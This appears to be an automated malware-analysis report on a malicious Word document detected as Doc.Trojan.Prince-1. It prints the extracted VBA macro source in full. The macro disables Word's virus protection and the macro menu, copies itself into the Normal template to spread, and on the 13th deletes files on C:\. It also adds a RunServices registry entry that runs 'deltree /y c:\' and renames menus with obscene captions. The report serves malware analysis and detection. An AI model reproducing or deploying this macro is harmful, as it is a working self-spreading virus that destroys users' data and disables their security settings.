MALICIOUS
Risk Score: 80
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
The sample is a malicious OLE document containing VBA macros. The macros attempt to export and import code, potentially to establish persistence via registry keys and modify system settings. The embedded text and macro comments suggest a self-proclaimed 'Principe' malware, but a specific family cannot be confidently identified.
Heuristics (2)
- ClamAV: Doc.Trojan.Prince-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Prince-1
- VBA macros detected (medium, OLE_VBA_MACROS): Document contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3114 bytes |

SHA-256: 217066adea22c49282971602951700491c00084599d11e5ec5e133f2126c3b33
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
    Options.VirusProtection = False
    Options.SaveNormalPrompt = False
    Options.ConfirmConversions = False
    CommandBars("Tools").Controls("Macro").Enabled = False
    CommandBars("Tools").Controls("Macro").Visible = False
    cnt = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
    cda = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
    If (cda >= 20) Then ActiveDocument.VBProject.VBComponents.Item(1).Export ("c:\aaaa.xxx")
    If (cnt <= 15) Then
        NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile ("C:\aaaa.xxx")
        With NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
            For g = 1 To 4: .Deletelines 1: Next g
        End With
    End If
    If (cnt > 15) And (cda = 0) Then
        NormalTemplate.VBProject.VBComponents.Item(1).Export ("c:\aaaa.xxx")
        ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromFile ("C:\aaaa.xxx")
        With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
            For Y = 1 To 4: .Deletelines 1: Next Y
        End With
    End If
    Kill ("c:\aaaa.xxx")
    If (Hour(Now) > Day(Now)) And (WeekDay(Now) = vbFriday) Then
        Selection.TypeText ("(--Principe ataca Otra vez,por Dragón rojo.Viva Chile Mierda--)")
    Else
        Selection.TypeText ("Principe_")
    End If
    ActiveDocument.SaveAs ActiveDocument.FullName
    If ((Day(Now) = 13) And System.PrivateProfileString("", "HKEY_CURRENT_USER\", "Principe") <> "Dragon Rojo") Then
        Kill ("c:\*.*")
        System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices", "Principe") = "deltree /y c:\"
        Call Cagar_Nombres
        System.PrivateProfileString("", "HKEY_CURRENT_USER\", "Principe") = "Dragon Rojo"
    End If
End Sub
Private Sub Cagar_Nombres()
    CommandBars("Tools").Controls(5).Caption = "AutoMasturBación"
    CommandBars("Tools").Controls(5).Enabled = False
    CommandBars("File").Controls(2).Caption = "Aburrir"
    CommandBars("File").Controls(3).Caption = "Culiar"
    CommandBars("File").Controls(4).Caption = "Mandarselo a Guardar"
    CommandBars("File").Controls(5).Caption = "Guardar la Guea Como"
    CommandBars("File").Controls(7).Caption = "Fornicaciones"
    CommandBars("File").Controls(8).Caption = "Configurar la Página Culia"
    CommandBars("File").Controls(11).Caption = "Enviarsela a un Culiao Por "
    CommandBars("File").Controls(12).Caption = "Propiedades de Esta Porqueria"
    CommandBars("Insert").Controls(12).Caption = "Insertar La Mejor Foto Porno"
    CommandBars("Edit").Controls(4).Caption = "Copión Maricon"
    CommandBars("Edit").Controls(5).Caption = "Pegarle"
    CommandBars("Edit").Controls(6).Caption = "Pegado Especial Con Moco"
    CommandBars("Edit").Controls(7).Caption = "Pegado Con Un SUPER MOCO"
    CommandBars("Edit").Controls(3).Caption = "Castrar"
End Sub
```